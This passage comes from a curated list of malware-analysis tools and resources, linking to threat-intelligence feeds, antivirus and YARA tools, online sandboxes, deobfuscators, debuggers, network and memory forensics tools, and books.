List of the most looked up file hashes from MetaDefender Cloud. * [OpenIOC](https://www.fireeye.com/services/freeware.html) - Framework for sharing threat intelligence. * [Proofpoint Threat Intelligence](https://www.proofpoint.com/us/products/et-intelligence) - Rulesets and more. (Formerly Emerging Threats.) * [Ransomware overview](https://docs.google.com/spreadsheets/d/1TWS238xacAto-fLKh1n5uTsdijWdCEsGIM0Y0Hvmc5g/pubhtml) - A list of ransomware overview with details, detection and prevention. * [STIX - Structured Threat Information eXpression](http://stixproject.github.io) - Standardized language to represent and share cyber threat information. Related efforts from [MITRE](https://www.mitre.org/): - [CAPEC - Common Attack Pattern Enumeration and Classification](http://capec.mitre.org/) - [CybOX - Cyber Observables eXpression](http://cyboxproject.github.io) - [MAEC - Malware Attribute Enumeration and Characterization](http://maec.mitre.org/) - [TAXII - Trusted Automated eXchange of Indicator Information](http://taxiiproject.github.io) * [SystemLookup](https://www.systemlookup.com/) - SystemLookup hosts a collection of lists that provide information on the components of legitimate and potentially unwanted programs. * [ThreatMiner](https://www.threatminer.org/) - Data mining portal for threat intelligence, with search. * [threatRECON](https://threatrecon.co/) - Search for indicators, up to 1000 free per month. * [ThreatShare](https://threatshare.io/) - C2 panel tracker * [Yara rules](https://github.com/Yara-Rules/rules) - Yara rules repository. * [YETI](https://github.com/yeti-platform/yeti) - Yeti is a platform meant to organize observables, indicators of compromise, TTPs, and knowledge on threats in a single, unified repository. * [ZeuS Tracker](https://zeustracker.abuse.ch/blocklist.php) - ZeuS blocklists. ## Detection and Classification *Antivirus and other malware identification tools* * [AnalyzePE](https://github.com/hiddenillusion/AnalyzePE) - Wrapper for a variety of tools for reporting on Windows PE files. * [Assemblyline](https://bitbucket.org/cse-assemblyline/assemblyline) - A scalable distributed file analysis framework. * [BinaryAlert](https://github.com/airbnb/binaryalert) - An open source, serverless AWS pipeline that scans and alerts on uploaded files based on a set of YARA rules. * [capa](https://github.com/fireeye/capa) - Detects capabilities in executable files. * [chkrootkit](http://www.chkrootkit.org/) - Local Linux rootkit detection. * [ClamAV](http://www.clamav.net/) - Open source antivirus engine. * [Detect It Easy(DiE)](https://github.com/horsicq/Detect-It-Easy) - A program for determining types of files. * [Exeinfo PE](http://exeinfo.pe.hu/) - Packer, compressor detector, unpack info, internal exe tools. * [ExifTool](https://sno.phy.queensu.ca/~phil/exiftool/) - Read, write and edit file metadata. * [File Scanning Framework](https://github.com/EmersonElectricCo/fsf) - Modular, recursive file scanning solution. * [fn2yara](https://github.com/cmu-sei/pharos) - FN2Yara is a tool to generate Yara signatures for matching functions (code) in an executable program. * [Generic File Parser](https://github.com/uppusaikiran/generic-parser) - A Single Library Parser to extract meta information,static analysis and detect macros within the files. * [hashdeep](https://github.com/jessek/hashdeep) - Compute digest hashes with a variety of algorithms. * [HashCheck](https://github.com/gurnec/HashCheck) - Windows shell extension to compute hashes with a variety of algorithms. * [Loki](https://github.com/Neo23x0/Loki) - Host based scanner for IOCs. * [Malfunction](https://github.com/Dynetics/Malfunction) - Catalog and compare malware at a function level. * [Manalyze](https://github.com/JusticeRage/Manalyze) - Static analyzer for PE executables. * [MASTIFF](https://github.com/KoreLogicSecurity/mastiff) - Static analysis framework. * [MultiScanner](https://github.com/mitre/multiscanner) - Modular file scanning/analysis framework * [Nauz File Detector(NFD)](https://github.com/horsicq/Nauz-File-Detector) - Linker/Compiler/Tool detector for Windows, Linux and MacOS. * [nsrllookup](https://github.com/rjhansen/nsrllookup) - A tool for looking up hashes in NIST's National Software Reference Library database. * [packerid](http://handlers.sans.org/jclausing/packerid.py) - A cross-platform Python alternative to PEiD. * [PE-bear](https://hshrzd.wordpress.com/pe-bear/) - Reversing tool for PE files. * [PEframe](https://github.com/guelfoweb/peframe) - PEframe is an open source tool to perform static analysis on Portable Executable malware and malicious MS Office documents. * [PEV](http://pev.sourceforge.net/) - A multiplatform toolkit to work with PE files, providing feature-rich tools for proper analysis of suspicious binaries. * [PortEx](https://github.com/katjahahn/PortEx) - Java library to analyse PE files with a special focus on malware analysis and PE malformation robustness. * [Quark-Engine](https://github.com/quark-engine/quark-engine) - An Obfuscation-Neglect Android Malware Scoring System * [Rootkit Hunter](http://rkhunter.sourceforge.net/) - Detect Linux rootkits. * [ssdeep](https://ssdeep-project.github.io/ssdeep/) - Compute fuzzy hashes. * [totalhash.py](https://gist.github.com/gleblanc1783/3c8e6b379fa9d646d401b96ab5c7877f) - Python script for easy searching of the [TotalHash.cymru.com](https://totalhash.cymru.com/) database. * [TrID](http://mark0.net/soft-trid-e.html) - File identifier. * [YARA](https://plusvic.github.io/yara/) - Pattern matching tool for analysts. * [Yara rules generator](https://github.com/Neo23x0/yarGen) - Generate yara rules based on a set of malware samples. Also contains a good strings DB to avoid false positives. * [Yara Finder](https://github.com/uppusaikiran/yara-finder) - A simple tool to yara match the file against various yara rules to find the indicators of suspicion. ## Online Scanners and Sandboxes *Web-based multi-AV scanners, and malware sandboxes for automated analysis.* * [anlyz.io](https://sandbox.anlyz.io/) - Online sandbox. * [any.run](https://app.any.run/) - Online interactive sandbox. * [AndroTotal](https://andrototal.org/) - Free online analysis of APKs against multiple mobile antivirus apps. * [AVCaesar](https://avcaesar.malware.lu/) - Malware.lu online scanner and malware repository. * [BoomBox](https://github.com/nbeede/BoomBox) - Automatic deployment of Cuckoo Sandbox malware lab using Packer and Vagrant. * [Cryptam](http://www.cryptam.com/) - Analyze suspicious office documents. * [Cuckoo Sandbox](https://cuckoosandbox.org/) - Open source, self hosted sandbox and automated analysis system. * [cuckoo-modified](https://github.com/brad-accuvant/cuckoo-modified) - Modified version of Cuckoo Sandbox released under the GPL. Not merged upstream due to legal concerns by the author. * [cuckoo-modified-api](https://github.com/keithjjones/cuckoo-modified-api) - A Python API used to control a cuckoo-modified sandbox. * [DeepViz](https://www.deepviz.com/) - Multi-format file analyzer with machine-learning classification. * [detux](https://github.com/detuxsandbox/detux/) - A sandbox developed to do traffic analysis of Linux malwares and capturing IOCs. * [DRAKVUF](https://github.com/tklengyel/drakvuf) - Dynamic malware analysis system. * [firmware.re](http://firmware.re/) - Unpacks, scans and analyzes almost any firmware package. * [HaboMalHunter](https://github.com/Tencent/HaboMalHunter) - An Automated Malware Analysis Tool for Linux ELF Files. * [Hybrid Analysis](https://www.hybrid-analysis.com/) - Online malware analysis tool, powered by VxSandbox. * [Intezer](https://analyze.intezer.com) - Detect, analyze, and categorize malware by identifying code reuse and code similarities. * [IRMA](http://irma.quarkslab.com/) - An asynchronous and customizable analysis platform for suspicious files. * [Joe Sandbox](https://www.joesecurity.org) - Deep malware analysis with Joe Sandbox. * [Jotti](https://virusscan.jotti.org/en) - Free online multi-AV scanner. * [Limon](https://github.com/monnappa22/Limon) - Sandbox for Analyzing Linux Malware. * [Malheur](https://github.com/rieck/malheur) - Automatic sandboxed analysis of malware behavior. * [malice.io](https://github.com/maliceio/malice) - Massively scalable malware analysis framework. * [malsub](https://github.com/diogo-fernan/malsub) - A Python RESTful API framework for online malware and URL analysis services. * [Malware config](https://malwareconfig.com/) - Extract, decode and display online the configuration settings from common malwares. * [MalwareAnalyser.io](https://malwareanalyser.io/) - Online malware anomaly-based static analyser with heuristic detection engine powered by data mining and machine learning. * [Malwr](https://malwr.com/) - Free analysis with an online Cuckoo Sandbox instance. * [MetaDefender Cloud](https://metadefender.opswat.com/ ) - Scan a file, hash, IP, URL or domain address for malware for free. * [NetworkTotal](https://www.networktotal.com/index.html) - A service that analyzes pcap files and facilitates the quick detection of viruses, worms, trojans, and all kinds of malware using Suricata configured with EmergingThreats Pro. * [Noriben](https://github.com/Rurik/Noriben) - Uses Sysinternals Procmon to collect information about malware in a sandboxed environment. * [PacketTotal](https://packettotal.com/) - PacketTotal is an online engine for analyzing .pcap files, and visualizing the network traffic within. * [PDF Examiner](http://www.pdfexaminer.com/) - Analyse suspicious PDF files. * [ProcDot](http://www.procdot.com) - A graphical malware analysis tool kit. * [Recomposer](https://github.com/secretsquirrel/recomposer) - A helper script for safely uploading binaries to sandbox sites. * [sandboxapi](https://github.com/InQuest/python-sandboxapi) - Python library for building integrations with several open source and commercial malware sandboxes. * [SEE](https://github.com/F-Secure/see) - Sandboxed Execution Environment (SEE) is a framework for building test automation in secured Environments. * [SEKOIA Dropper Analysis](https://malware.sekoia.fr/) - Online dropper analysis (Js, VBScript, Microsoft Office, PDF). * [VirusTotal](https://www.virustotal.com/) - Free online analysis of malware samples and URLs * [Visualize_Logs](https://github.com/keithjjones/visualize_logs) - Open source visualization library and command line tools for logs. (Cuckoo, Procmon, more to come...) * [Zeltser's List](https://zeltser.com/automated-malware-analysis/) - Free automated sandboxes and services, compiled by Lenny Zeltser. ## Domain Analysis *Inspect domains and IP addresses.* * [AbuseIPDB](https://www.abuseipdb.com/) - AbuseIPDB is a project dedicated to helping combat the spread of hackers, spammers, and abusive activity on the internet. * [badips.com](https://www.badips.com/) - Community based IP blacklist service. * [boomerang](https://github.com/EmersonElectricCo/boomerang) - A tool designed for consistent and safe capture of off network web resources. * [Cymon](https://cymon.io/) - Threat intelligence tracker, with IP/domain/hash search. * [Desenmascara.me](http://desenmascara.me) - One click tool to retrieve as much metadata as possible for a website and to assess its good standing. * [Dig](https://networking.ringofsaturn.com/) - Free online dig and other network tools. * [dnstwist](https://github.com/elceef/dnstwist) - Domain name permutation engine for detecting typo squatting, phishing and corporate espionage. * [IPinfo](https://github.com/hiddenillusion/IPinfo) - Gather information about an IP or domain by searching online resources. * [Machinae](https://github.com/hurricanelabs/machinae) - OSINT tool for gathering information about URLs, IPs, or hashes. Similar to Automator. * [mailchecker](https://github.com/FGRibreau/mailchecker) - Cross-language temporary email detection library. * [MaltegoVT](https://github.com/michael-yip/MaltegoVT) - Maltego transform for the VirusTotal API. Allows domain/IP research, and searching for file hashes and scan reports. * [Multi rbl](http://multirbl.valli.org/) - Multiple DNS blacklist and forward confirmed reverse DNS lookup over more than 300 RBLs. * [NormShield Services](https://services.normshield.com/) - Free API Services for detecting possible phishing domains, blacklisted ip addresses and breached accounts. * [PhishStats](https://phishstats.info/) - Phishing Statistics with search for IP, domain and website title * [Spyse](https://spyse.com/) - subdomains, whois, realted domains, DNS, hosts AS, SSL/TLS info, * [SecurityTrails](https://securitytrails.com/) - Historical and current WHOIS, historical and current DNS records, similar domains, certificate information and other domain and IP related API and tools. * [SpamCop](https://www.spamcop.net/bl.shtml) - IP based spam block list. * [SpamHaus](https://www.spamhaus.org/lookup/) - Block list based on domains and IPs. * [Sucuri SiteCheck](https://sitecheck.sucuri.net/) - Free Website Malware and Security Scanner. * [Talos Intelligence](https://talosintelligence.com/) - Search for IP, domain or network owner. (Previously SenderBase.) * [TekDefense Automater](http://www.tekdefense.com/automater/) - OSINT tool for gathering information about URLs, IPs, or hashes. * [URLhaus](https://urlhaus.abuse.ch/) - A project from abuse.ch with the goal of sharing malicious URLs that are being used for malware distribution. * [URLQuery](http://urlquery.net/) - Free URL Scanner. * [urlscan.io](https://urlscan.io/) - Free URL Scanner & domain information. * [Whois](https://whois.domaintools.com/) - DomainTools free online whois search. * [Zeltser's List](https://zeltser.com/lookup-malicious-websites/) - Free online tools for researching malicious websites, compiled by Lenny Zeltser. * [ZScalar Zulu](https://zulu.zscaler.com/#) - Zulu URL Risk Analyzer. ## Browser Malware *Analyze malicious URLs. See also the [domain analysis](#domain-analysis) and [documents and shellcode](#documents-and-shellcode) sections.* * [Bytecode Viewer](https://github.com/Konloch/bytecode-viewer) - Combines multiple Java bytecode viewers and decompilers into one tool, including APK/DEX support. * [Firebug](https://getfirebug.com/) - Firefox extension for web development. * [Java Decompiler](http://jd.benow.ca/) - Decompile and inspect Java apps. * [Java IDX Parser](https://github.com/Rurik/Java_IDX_Parser/) - Parses Java IDX cache files. * [JSDetox](http://www.relentless-coding.com/projects/jsdetox/) - JavaScript malware analysis tool. * [jsunpack-n](https://github.com/urule99/jsunpack-n) - A javascript unpacker that emulates browser functionality. * [Krakatau](https://github.com/Storyyeller/Krakatau) - Java decompiler, assembler, and disassembler. * [Malzilla](http://malzilla.sourceforge.net/) - Analyze malicious web pages. * [RABCDAsm](https://github.com/CyberShadow/RABCDAsm) - A "Robust ActionScript Bytecode Disassembler." * [SWF Investigator](https://labs.adobe.com/technologies/swfinvestigator/) - Static and dynamic analysis of SWF applications. * [swftools](http://www.swftools.org/) - Tools for working with Adobe Flash files. * [xxxswf](http://hooked-on-mnemonics.blogspot.com/2011/12/xxxswfpy.html) - A Python script for analyzing Flash files. ## Documents and Shellcode *Analyze malicious JS and shellcode from PDFs and Office documents. See also the [browser malware](#browser-malware) section.* * [AnalyzePDF](https://github.com/hiddenillusion/AnalyzePDF) - A tool for analyzing PDFs and attempting to determine whether they are malicious. * [box-js](https://github.com/CapacitorSet/box-js) - A tool for studying JavaScript malware, featuring JScript/WScript support and ActiveX emulation. * [diStorm](http://www.ragestorm.net/distorm/) - Disassembler for analyzing malicious shellcode. * [InQuest Deep File Inspection](https://labs.inquest.net/dfi) - Upload common malware lures for Deep File Inspection and heuristical analysis. * [JS Beautifier](http://jsbeautifier.org/) - JavaScript unpacking and deobfuscation. * [libemu](http://libemu.carnivore.it/) - Library and tools for x86 shellcode emulation. * [malpdfobj](https://github.com/9b/malpdfobj) - Deconstruct malicious PDFs into a JSON representation. * [OfficeMalScanner](http://www.reconstructer.org/code.html) - Scan for malicious traces in MS Office documents. * [olevba](http://www.decalage.info/python/olevba) - A script for parsing OLE and OpenXML documents and extracting useful information. * [Origami PDF](https://code.google.com/archive/p/origami-pdf) - A tool for analyzing malicious PDFs, and more. * [PDF Tools](https://blog.didierstevens.com/programs/pdf-tools/) - pdfid, pdf-parser, and more from Didier Stevens. * [PDF X-Ray Lite](https://github.com/9b/pdfxray_lite) - A PDF analysis tool, the backend-free version of PDF X-RAY. * [peepdf](http://eternal-todo.com/tools/peepdf-pdf-analysis-tool) - Python tool for exploring possibly malicious PDFs. * [QuickSand](https://www.quicksand.io/) - QuickSand is a compact C framework to analyze suspected malware documents to identify exploits in streams of different encodings and to locate and extract embedded executables. * [Spidermonkey](https://developer.mozilla.org/en-US/docs/Mozilla/Projects/SpiderMonkey) - Mozilla's JavaScript engine, for debugging malicious JS. ## File Carving *For extracting files from inside disk and memory images.* * [bulk_extractor](https://github.com/simsong/bulk_extractor) - Fast file carving tool. * [EVTXtract](https://github.com/williballenthin/EVTXtract) - Carve Windows Event Log files from raw binary data. * [Foremost](http://foremost.sourceforge.net/) - File carving tool designed by the US Air Force. * [hachoir3](https://github.com/vstinner/hachoir3) - Hachoir is a Python library to view and edit a binary stream field by field. * [Scalpel](https://github.com/sleuthkit/scalpel) - Another data carving tool. * [SFlock](https://github.com/jbremer/sflock) - Nested archive extraction/unpacking (used in Cuckoo Sandbox). ## Deobfuscation *Reverse XOR and other code obfuscation methods.* * [Balbuzard](https://bitbucket.org/decalage/balbuzard/wiki/Home) - A malware analysis tool for reversing obfuscation (XOR, ROL, etc) and more. * [de4dot](https://github.com/0xd4d/de4dot) - .NET deobfuscator and unpacker. * [ex_pe_xor](http://hooked-on-mnemonics.blogspot.com/2014/04/expexorpy.html) & [iheartxor](http://hooked-on-mnemonics.blogspot.com/p/iheartxor.html) - Two tools from Alexander Hanel for working with single-byte XOR encoded files. * [FLOSS](https://github.com/fireeye/flare-floss) - The FireEye Labs Obfuscated String Solver uses advanced static analysis techniques to automatically deobfuscate strings from malware binaries. * [NoMoreXOR](https://github.com/hiddenillusion/NoMoreXOR) - Guess a 256 byte XOR key using frequency analysis. * [PackerAttacker](https://github.com/BromiumLabs/PackerAttacker) - A generic hidden code extractor for Windows malware. * [PyInstaller Extractor](https://github.com/extremecoders-re/pyinstxtractor) - A Python script to extract the contents of a PyInstaller generated Windows executable file. The contents of the pyz file (usually pyc files) present inside the executable are also extracted and automatically fixed so that a Python bytecode decompiler will recognize it. * [uncompyle6](https://github.com/rocky/python-uncompyle6/) - A cross-version Python bytecode decompiler. Translates Python bytecode back into equivalent Python source code. * [un{i}packer](https://github.com/unipacker/unipacker) - Automatic and platform-independent unpacker for Windows binaries based on emulation. * [unpacker](https://github.com/malwaremusings/unpacker/) - Automated malware unpacker for Windows malware based on WinAppDbg. * [unxor](https://github.com/tomchop/unxor/) - Guess XOR keys using known-plaintext attacks. * [VirtualDeobfuscator](https://github.com/jnraber/VirtualDeobfuscator) - Reverse engineering tool for virtualization wrappers. * [XORBruteForcer](http://eternal-todo.com/var/scripts/xorbruteforcer) - A Python script for brute forcing single-byte XOR keys. * [XORSearch & XORStrings](https://blog.didierstevens.com/programs/xorsearch/) - A couple programs from Didier Stevens for finding XORed data. * [xortool](https://github.com/hellman/xortool) - Guess XOR key length, as well as the key itself. ## Debugging and Reverse Engineering *Disassemblers, debuggers, and other static and dynamic analysis tools.* * [angr](https://github.com/angr/angr) - Platform-agnostic binary analysis framework developed at UCSB's Seclab. * [bamfdetect](https://github.com/bwall/bamfdetect) - Identifies and extracts information from bots and other malware. * [BAP](https://github.com/BinaryAnalysisPlatform/bap) - Multiplatform and open source (MIT) binary analysis framework developed at CMU's Cylab. * [BARF](https://github.com/programa-stic/barf-project) - Multiplatform, open source Binary Analysis and Reverse engineering Framework. * [binnavi](https://github.com/google/binnavi) - Binary analysis IDE for reverse engineering based on graph visualization. * [Binary ninja](https://binary.ninja/) - A reversing engineering platform that is an alternative to IDA. * [Binwalk](https://github.com/devttys0/binwalk) - Firmware analysis tool. * [BluePill](https://github.com/season-lab/bluepill) - Framework for executing and debugging evasive malware and protected executables. * [Capstone](https://github.com/aquynh/capstone) - Disassembly framework for binary analysis and reversing, with support for many architectures and bindings in several languages. * [codebro](https://github.com/hugsy/codebro) - Web based code browser using ย clang to provide basic code analysis. * [Cutter](https://github.com/radareorg/cutter) - GUI for Radare2. * [DECAF (Dynamic Executable Code Analysis Framework)](https://github.com/sycurelab/DECAF) -ย A binary analysis platform based ย  on QEMU. DroidScope is now an extension to DECAF. * [dnSpy](https://github.com/0xd4d/dnSpy) - .NET assembly editor, decompiler and debugger. * [dotPeek](https://www.jetbrains.com/decompiler/) - Free .NET Decompiler and Assembly Browser. * [Evan's Debugger (EDB)](http://codef00.com/projects#debugger) - A modular debugger with a Qt GUI. * [Fibratus](https://github.com/rabbitstack/fibratus) - Tool for exploration and tracing of the Windows kernel. * [FPort](https://www.mcafee.com/us/downloads/free-tools/fport.aspx) - Reports open TCP/IP and UDP ports in a live system and maps them to the owning application. * [GDB](http://www.sourceware.org/gdb/) - The GNU debugger. * [GEF](https://github.com/hugsy/gef) - GDB Enhanced Features, for exploiters and reverse engineers. * [Ghidra](https://github.com/NationalSecurityAgency/ghidra) - A software reverse engineering (SRE) framework created and maintained by the National Security Agency Research Directorate. * [hackers-grep](https://github.com/codypierce/hackers-grep) - A utility to search for strings in PE executables including imports, exports, and debug symbols. * [Hopper](https://www.hopperapp.com/) - The macOS and Linux Disassembler. * [IDA Pro](https://www.hex-rays.com/products/ida/index.shtml) - Windows disassembler and debugger, with a free evaluation version. * [IDR](https://github.com/crypto2011/IDR) - Interactive Delphi Reconstructor is a decompiler of Delphi executable files and dynamic libraries. * [Immunity Debugger](http://debugger.immunityinc.com/) - Debugger for malware analysis and more, with a Python API. * [ILSpy](http://ilspy.net/) - ILSpy is the open-source .NET assembly browser and decompiler. * [Kaitai Struct](http://kaitai.io/) - DSL for file formats / network protocols / data structures reverse engineering and dissection, with code generation for C++, C#, Java, JavaScript, Perl, PHP, Python, Ruby. * [LIEF](https://lief.quarkslab.com/) - LIEF provides a cross-platform library to parse, modify and abstract ELF, PE and MachO formats. * [ltrace](http://ltrace.org/) - Dynamic analysis for Linux executables. * [mac-a-mal](https://github.com/phdphuc/mac-a-mal) - An automated framework for mac malware hunting. * [objdump](https://en.wikipedia.org/wiki/Objdump) - Part of GNU binutils, for static analysis of Linux binaries. * [OllyDbg](http://www.ollydbg.de/) - An assembly-level debugger for Windows executables. * [OllyDumpEx](https://low-priority.appspot.com/ollydumpex/) - Dump memory from (unpacked) malware Windows process and store raw or rebuild PE file. This is a plugin for OllyDbg, Immunity Debugger, IDA Pro, WinDbg, and x64dbg. * [PANDA](https://github.com/moyix/panda) - Platform for Architecture-Neutral Dynamic Analysis. * [PEDA](https://github.com/longld/peda) - Python Exploit Development Assistance for GDB, an enhanced display with added commands. * [pestudio](https://winitor.com/) - Perform static analysis of Windows executables. * [Pharos](https://github.com/cmu-sei/pharos) - The Pharos binary analysis framework can be used to perform automated static analysis of binaries. * [plasma](https://github.com/plasma-disassembler/plasma) - Interactive disassembler for x86/ARM/MIPS. * [PPEE (puppy)](https://www.mzrst.com/) - A Professional PE file Explorer for reversers, malware researchers and those who want to statically inspect PE files in more detail. * [Process Explorer](https://docs.microsoft.com/en-us/sysinternals/downloads/process-explorer) - Advanced task manager for Windows. * [Process Hacker](http://processhacker.sourceforge.net/) - Tool that monitors system resources. * [Process Monitor](https://docs.microsoft.com/en-us/sysinternals/downloads/procmon) - Advanced monitoring tool for Windows programs. * [PSTools](https://docs.microsoft.com/en-us/sysinternals/downloads/pstools) - Windows command-line tools that help manage and investigate live systems. * [Pyew](https://github.com/joxeankoret/pyew) - Python tool for malware analysis. * [PyREBox](https://github.com/Cisco-Talos/pyrebox) - Python scriptable reverse engineering sandbox by the Talos team at Cisco. * [QKD](https://github.com/ispras/qemu/releases/) - QEMU with embedded WinDbg server for stealth debugging. * [Radare2](http://www.radare.org/r/) - Reverse engineering framework, with debugger support. * [RegShot](https://sourceforge.net/projects/regshot/) - Registry compare utility that compares snapshots. * [RetDec](https://retdec.com/) - Retargetable machine-code decompiler with an [online decompilation service](https://retdec.com/decompilation/) and [API](https://retdec.com/api/) that you can use in your tools. * [ROPMEMU](https://github.com/Cisco-Talos/ROPMEMU) - A framework to analyze, dissect and decompile complex code-reuse attacks. * [Scylla Imports Reconstructor](https://github.com/NtQuery/Scylla) - Find and fix the IAT of an unpacked / dumped PE32 malware. * [ScyllaHide](https://github.com/x64dbg/ScyllaHide) - An Anti-Anti-Debug library and plugin for OllyDbg, x64dbg, IDA Pro, and TitanEngine. * [SMRT](https://github.com/pidydx/SMRT) - Sublime Malware Research Tool, a plugin for Sublime 3 to aid with malware analyis. * [strace](https://sourceforge.net/projects/strace/) - Dynamic analysis for Linux executables. * [StringSifter](https://github.com/fireeye/stringsifter) - A machine learning tool that automatically ranks strings based on their relevance for malware analysis. * [Triton](https://triton.quarkslab.com/) - A dynamic binary analysis (DBA) framework. * [Udis86](https://github.com/vmt/udis86) - Disassembler library and tool for x86 and x86_64. * [Vivisect](https://github.com/vivisect/vivisect) - Python tool for malware analysis. * [WinDbg](https://developer.microsoft.com/en-us/windows/hardware/download-windbg) - multipurpose debugger for the Microsoft Windows computer operating system, used to debug user mode applications, device drivers, and the kernel-mode memory dumps. * [X64dbg](https://github.com/x64dbg/) - An open-source x64/x32 debugger for windows. ## Network *Analyze network interactions.* * [Bro](https://www.bro.org) - Protocol analyzer that operates at incredible scale; both file and network protocols. * [BroYara](https://github.com/hempnall/broyara) - Use Yara rules from Bro. * [CapTipper](https://github.com/omriher/CapTipper) - Malicious HTTP traffic explorer. * [chopshop](https://github.com/MITRECND/chopshop) - Protocol analysis and decoding framework. * [CloudShark](https://www.cloudshark.org) - Web-based tool for packet analysis and malware traffic detection. * [FakeNet-NG](https://github.com/fireeye/flare-fakenet-ng) - Next generation dynamic network analysis tool. * [Fiddler](https://www.telerik.com/fiddler) - Intercepting web proxy designed for "web debugging." * [Hale](https://github.com/pjlantz/Hale) - Botnet C&C monitor. * [Haka](http://www.haka-security.org/) - An open source security oriented language for describing protocols and applying security policies on (live) captured traffic. * [HTTPReplay](https://github.com/jbremer/httpreplay) - Library for parsing and reading out PCAP files, including TLS streams using TLS Master Secrets (used in Cuckoo Sandbox). * [INetSim](http://www.inetsim.org/) - Network service emulation, useful when building a malware lab. * [Laika BOSS](https://github.com/lmco/laikaboss) - Laika BOSS is a file-centric malware analysis and intrusion detection system. * [Malcolm](https://github.com/idaholab/Malcolm) - Malcolm is a powerful, easily deployable network traffic analysis tool suite for full packet capture artifacts (PCAP files) and Zeek logs. * [Malcom](https://github.com/tomchop/malcom) - Malware Communications Analyzer. * [Maltrail](https://github.com/stamparm/maltrail) - A malicious traffic detection system, utilizing publicly available (black)lists containing malicious and/or generally suspicious trails and featuring an reporting and analysis interface. * [mitmproxy](https://mitmproxy.org/) - Intercept network traffic on the fly. * [Moloch](https://github.com/aol/moloch) - IPv4 traffic capturing, indexing and database system. * [NetworkMiner](http://www.netresec.com/?page=NetworkMiner) - Network forensic analysis tool, with a free version. * [ngrep](https://github.com/jpr5/ngrep) - Search through network traffic like grep. * [PcapViz](https://github.com/mateuszk87/PcapViz) - Network topology and traffic visualizer. * [Python ICAP Yara](https://github.com/RamadhanAmizudin/python-icap-yara) - An ICAP Server with yara scanner for URL or content. * [Squidmagic](https://github.com/ch3k1/squidmagic) - squidmagic is a tool designed to analyze a web-based network traffic to detect central command and control (C&C) servers and malicious sites, using Squid proxy server and Spamhaus. * [Tcpdump](http://www.tcpdump.org/) - Collect network traffic. * [tcpick](http://tcpick.sourceforge.net/) - Trach and reassemble TCP streams from network traffic. * [tcpxtract](http://tcpxtract.sourceforge.net/) - Extract files from network traffic. * [Wireshark](https://www.wireshark.org/) - The network traffic analysis tool. ## Memory Forensics *Tools for dissecting malware in memory images or running systems.* * [BlackLight](https://www.blackbagtech.com/blacklight.html) - Windows/MacOS forensics client supporting hiberfil, pagefile, raw memory analysis. * [DAMM](https://github.com/504ensicsLabs/DAMM) - Differential Analysis of Malware in Memory, built on Volatility. * [evolve](https://github.com/JamesHabben/evolve) - Web interface for the Volatility Memory Forensics Framework. * [FindAES](https://sourceforge.net/projects/findaes/) - Find AES encryption keys in memory. * [inVtero.net](https://github.com/ShaneK2/inVtero.net) - High speed memory analysis framework developed in .NET supports all Windows x64, includes code integrity and write support. * [Muninn](https://github.com/ytisf/muninn) - A script to automate portions of analysis using Volatility, and create a readable report. * [Rekall](http://www.rekall-forensic.com/) - Memory analysis framework, forked from Volatility in 2013. * [TotalRecall](https://github.com/sketchymoose/TotalRecall) - Script based on Volatility for automating various malware analysis tasks. * [VolDiff](https://github.com/aim4r/VolDiff) - Run Volatility on memory images before and after malware execution, and report changes. * [Volatility](https://github.com/volatilityfoundation/volatility) - Advanced memory forensics framework. * [VolUtility](https://github.com/kevthehermit/VolUtility) - Web Interface for Volatility Memory Analysis framework. * [WDBGARK](https://github.com/swwwolf/wdbgark) - WinDBG Anti-RootKit Extension. * [WinDbg](https://developer.microsoft.com/en-us/windows/hardware/windows-driver-kit) - Live memory inspection and kernel debugging for Windows systems. ## Windows Artifacts * [AChoir](https://github.com/OMENScan/AChoir) - A live incident response script for gathering Windows artifacts. * [python-evt](https://github.com/williballenthin/python-evt) - Python library for parsing Windows Event Logs. * [python-registry](http://www.williballenthin.com/registry/) - Python library for parsing registry files. * [RegRipper](http://brettshavers.cc/index.php/brettsblog/tags/tag/regripper/) ([GitHub](https://github.com/keydet89/RegRipper2.8)) - Plugin-based registry analysis tool. ## Storage and Workflow * [Aleph](https://github.com/merces/aleph) - Open Source Malware Analysis Pipeline System. * [CRITs](https://crits.github.io/) - Collaborative Research Into Threats, a malware and threat repository. * [FAME](https://certsocietegenerale.github.io/fame/) - A malware analysis framework featuring a pipeline that can be extended with custom modules, which can be chained and interact with each other to perform end-to-end analysis. * [Malwarehouse](https://github.com/sroberts/malwarehouse) - Store, tag, and search malware. * [Polichombr](https://github.com/ANSSI-FR/polichombr) - A malware analysis platform designed to help analysts to reverse malwares collaboratively. * [stoQ](http://stoq.punchcyber.com) - Distributed content analysis framework with extensive plugin support, from input to output, and everything in between. * [Viper](http://viper.li/) - A binary management and analysis framework for analysts and researchers. ## Miscellaneous * [al-khaser](https://github.com/LordNoteworthy/al-khaser) - A PoC malware with good intentions that aimes to stress anti-malware systems. * [CryptoKnight](https://github.com/AbertayMachineLearningGroup/CryptoKnight) - Automated cryptographic algorithm reverse engineering and classification framework. * [DC3-MWCP](https://github.com/Defense-Cyber-Crime-Center/DC3-MWCP) - The Defense Cyber Crime Center's Malware Configuration Parser framework. * [FLARE VM](https://github.com/fireeye/flare-vm) - A fully customizable, Windows-based, security distribution for malware analysis. * [MalSploitBase](https://github.com/misterch0c/malSploitBase) - A database containing exploits used by malware. * [Malware Museum](https://archive.org/details/malwaremuseum) - Collection of malware programs that were distributed in the 1980s and 1990s. * [Malware Organiser](https://github.com/uppusaikiran/malware-organiser) - A simple tool to organise large malicious/benign files into a organised Structure. * [Pafish](https://github.com/a0rtega/pafish) - Paranoid Fish, a demonstration tool that employs several techniques to detect sandboxes and analysis environments in the same way as malware families do. * [REMnux](https://remnux.org/) - Linux distribution and docker images for malware reverse engineering and analysis. * [Tsurugi Linux](https://tsurugi-linux.org/) - Linux distribution designed to support your DFIR investigations, malware analysis and OSINT (Open Source INTelligence) activities. * [Santoku Linux](https://santoku-linux.com/) - Linux distribution for mobile forensics, malware analysis, and security. # Resources ## Books *Essential malware analysis reading material.* * [Learning Malware Analysis](https://www.packtpub.com/networking-and-servers/learning-malware-analysis) - Learning Malware Analysis: Explore the concepts, tools, and techniques to analuze and investigate Windows malware * [Malware Analyst's Cookbook and DVD](https://amzn.com/dp/0470613033) - Tools and Techniques for Fighting Malicious Code. * [Mastering Malware Analysis](https://www.packtpub.com/networking-and-servers/mastering-malware-analysis) - Mastering Malware Analysis: The complete malware analyst's guide to combating malicious software, APT, cybercime, and IoT attacks * [Mastering Reverse Engineering](https://www.packtpub.com/networking-and-servers/mastering-reverse-engineering) - Mastering Reverse Engineering: Re-engineer your ethical hacking skills * [Practical Malware Analysis](https://amzn.com/dp/1593272901) - The Hands-On Guide to Dissecting Malicious 